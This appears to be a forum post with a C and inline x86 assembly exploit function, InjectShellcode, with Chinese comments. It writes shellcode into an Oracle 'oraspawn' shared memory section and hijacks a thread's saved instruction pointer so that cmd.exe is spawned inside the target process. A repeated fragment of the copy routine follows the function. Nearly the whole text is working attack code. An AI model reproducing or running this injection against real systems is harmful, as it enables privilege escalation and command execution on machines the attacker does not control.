21,458
社区成员
发帖
与我相关
我的任务
分享
BOOL InjectShellcode(DWORD oldEIP,CHAR * oSID)
{
HMODULE hKernel;
FARPROC pCreateProc;
LPSTR sCommand="cmd.exe";
DWORD dwStrLen;
CHAR buff[100];
dwStrLen=strlen(sCommand);
hKernel=LoadLibrary("Kernel32.dll");
pCreateProc=GetProcAddress(hKernel,"CreateProcessA");
strcpy(buff, "Global\\*oraspawn_buffer_");
strncat(buff, oSID,50);
strcat(buff, "*");
HANDLE hMapFile = OpenFileMapping(FILE_MAP_WRITE, FALSE,buff); //打开共享内存
if (hMapFile == NULL) {
printf("Could not open Shared Section\n\n");
return FALSE;
}
else
printf("Shared Section opened\n");
LPVOID lpMapAddress = MapViewOfFile(hMapFile, FILE_MAP_WRITE,0,0,0);//映射共享内存到自己的进程空间
printf("Inserting shellcode...\n");
CHAR sWinSta[]="WinSta0\\Default";
//copy shellcode
_asm {
pushad
lea esi, Shellcode
mov edi, lpMapAddress
add edi, 0x500
lea ecx, End
sub ecx, esi;shellcode代码长度
push esi;保存esi,备用
push edi
cld
rep movsb;将shellcode复制到共享内存中
pop edi
pop esi
push edi
lea ecx, CommandBuf;下面的CommandBuf,用来保存CreateProcessA的第二个参数
sub ecx, esi
add edi, ecx
mov esi, sCommand;"cmd.exe"
mov ecx, dwStrLen
rep movsb;拷贝"cmd.exe"到CommandBuf处
mov [edi], 0x00;字符串结尾标志'\0'
pop edi
mov esi, pCreateProc
mov [edi+0x0a], esi;[edi+0x0a]处保存CreateProcessA的地址
mov esi, oldEIP
mov [edi+0x0e], esi;[edi+0x0e]处保存原来执行的EIP
add edi, 0x2f0;复制"WinSta0\\Default"到[edi+0x2f0]
lea esi, sWinSta
mov ecx, 0xf
cld
rep movsb
jmp Done
Shellcode:
jmp Start
// this gets overwritten
mov ax,0xffff;占位用
mov ax,0xffff
mov ax,0xffff
mov ax,0xffff
CommandBuf: // this gets overwritten
mov dword ptr[eax],0x55555555;这里的占位指令不会执行,是一个buffer,用来保存"cmd.exe"
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
Start:
call getDelta
getDelta:
pop edx // Get shellcode/shared section pointer
pushad
mov eax, edx
add eax, 0x200
push eax //LPPROCESS_INFORMATION,lpProcessInformation
add eax, 0x200
mov ebx, edx
xor bl, bl;指向Shellcode开始的位置
lea ecx, [ebx+0x2f0];指向"WinSta0\\Default"
lea ebx, [eax+0x8] ;STARTUPINFO.lpDesktop
mov [ebx], ecx //set windows station and desktop,填充STARTUPINFO结构体的成员lpDesktop
push eax //LPSTARTUPINFO,lpStartupInfo
push 0x0
push 0x0
push 0x0
push 0x0
push 0x0
push 0x0
lea eax, [edx-0x47] //"cmd.exe"
push eax // Command offset
push 0x0
call [edx-0x4f] // Call create process
popad
push [edx-0x4b] // old thread EIP,返回原来的代码处继续执行
ret
End:
Done:
popad
}
return TRUE;
}
lea esi, Shellcode;这里是复制shellcode到内存共享区域
mov edi, lpMapAddress
add edi, 0x500
lea ecx, End
sub ecx, esi
push esi
push edi
cld
rep movsb
pop edi
pop esi
push edi
lea ecx, CommandBuf ;填充第一个参数
sub ecx, esi
add edi, ecx
mov esi, sCommand
mov ecx, dwStrLen
rep movsb
mov [edi], 0x00
pop edi ;填充参数
mov esi, pCreateProc
mov [edi+0x0a], esi
mov esi, oldEIP
mov [edi+0x0e], esi 填充参数
add edi, 0x2f0
lea esi, sWinSta
mov ecx, 0xf
cld
rep movsb